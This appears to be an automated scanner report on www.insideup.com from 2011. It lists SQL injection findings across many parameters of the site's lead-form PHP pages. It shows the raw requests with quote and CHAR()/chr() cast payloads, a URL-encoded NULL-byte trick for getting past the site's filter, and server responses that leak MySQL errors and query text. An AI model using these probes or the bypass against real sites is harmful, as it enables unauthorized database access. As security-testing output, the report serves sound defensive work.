GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa'&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:18:52 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7366 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... )+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=i' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa''&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:18:54 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 48957
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The website parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the website parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa%00'&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=o83jipv4fummophv83sd4bf5f0; path=/ Content-Length: 7550 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ampaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a.'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=cast((select ' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa%00''&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 01:52:37 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=4vq9pao5umgkmqp5nntsrl0jb7; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>
The zip parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zip parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:09:27 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 6614 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/dima00/project.php?catId=80006&iusrc=-1 OR 17-7=10&address=Address&attr' at line 5
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:32:04 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=01r8nitdq372emgnq0eggtseq5; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow'/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3' OR prj.project_page_url = 'leadflow'/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=80006&group=dima00&template=3' OR prj.project_page_url = 'leadflow'/dima0' at line 5
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:32:18 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ruu1lblagu05nol14fscgcagj7; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/dima00'/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3' OR prj.project_page_url = 'leadflow/dima00'/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=80006&group=dima00&template=3' OR prj.project_page_url = 'leadflow/dima00' at line 5
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:32:27 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=6aeaf5enj3f2ltv4vslakpbim7; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/dima00/project_dynamic_page_updated.php'?catId=80006&group=dima00&template=3' OR prj.project_page_url = 'leadflow/dima00/project_dynamic_page_updated.php'?catId=80006&group=dima00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=80006&group=dima00&template=3' OR prj.project_page_url = 'leadflow/dima00' at line 5
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:26:29 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=aja3gk3nol2aec0kchgl89kjg5; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/dima00/project_dynamic_page_updated.php?catId=80006'&group=dima00&template=3' OR prj.project_page_url = 'leadflow/dima00/project_dynamic_page_updated.php?catId=80006'&group=dima00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group=dima00&template=3' OR prj.project_page_url = 'leadflow/dima00/project_dyna' at line 5
The group parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the group parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:26:37 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=jiiatqchr2og5g9656gf3k2o47; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00'&template=3' OR prj.project_page_url = 'leadflow/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00'&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/dima00/project_dynamic_page_updated.php?ca' at line 5
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:31:30 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=3n3hjc724f45sodvbjdqo6mk93; path=/ Content-Length: 2518 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... /dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3&1'=1' OR prj.project_page_url = 'leadflow/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/dima00/project_dynamic_page_updated.php?ca' at line 5
The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:27:00 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=1n2pm08o6h1fqss1e7unm5t9i7; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3'' OR prj.project_page_url = 'leadflow/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&templa' at line 5
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 04:31:24 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=pp4fbdqghhd9p0t681edh0kb85; path=/ Content-Length: 2222 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/fist00/project.php'?catId=10003&iusrc=iupsc' OR prj.project_page_url = 'leadflow/fist00/project.php'?catId=10003&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=10003&iusrc=iupsc' OR prj.project_page_url = 'leadflow/fist00/project.php' at line 5
The address parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the address parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:57:56 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=0nf066ktdtd4p2d976dba7r9r7; path=/ Content-Length: 6510 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2936__Financial statement creation&attributeId_453=2944__No - No preference&a' at line 5
The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_342_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:58:08 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=38tfnmmfpggg942m1k1th5feb5; path=/ Content-Length: 6510 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2936__Financial statement creation&attributeId_453=2944__No - No preference&a' at line 5
The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_343_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:58:45 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=6nfte34b5vhi12653e496qkua2; path=/ Content-Length: 6510 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2936__Financial statement creation&attributeId_453=2944__No - No preference&a' at line 5
The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_344_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:58:48 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=qs66bkkt2ehuoomlmt0kj5abm2; path=/ Content-Length: 6510 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2936__Financial statement creation&attributeId_453=2944__No - No preference&a' at line 5
The attributeId_452%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_452%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:58:56 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ti84504g1am5o7b3bk48t7q1g6; path=/ Content-Length: 6510 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'preference&attributeId_454=2948__Not sure&attributeId_455=2955__ASAP&attributeId' at line 5
The attributeId_453 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_453 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:59:05 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=mb6u8cegm274p3iq10equms4a0; path=/ Content-Length: 6510 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still in the planning stag' at line 5
The attributeId_454 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_454 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:59:16 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=dec87o80jo4kd3fj7gfcofbcm2; path=/ Content-Length: 6510 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'the planning stages&attributeId_457=2968__Less than $100,000&button3=Submit&comp' at line 5
The attributeId_455 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_455 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:59:26 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=oq84mlktscg2gf4s2a6pgqbc75; path=/ Content-Length: 6510 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'the planning stages&attributeId_457=2968__Less than $100,000&button3=Submit&comp' at line 5
The attributeId_456 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_456 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:59:32 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=pqp6khfeenmfvh8vc5inhalgc2; path=/ Content-Length: 6510 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s'&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstna' at line 5
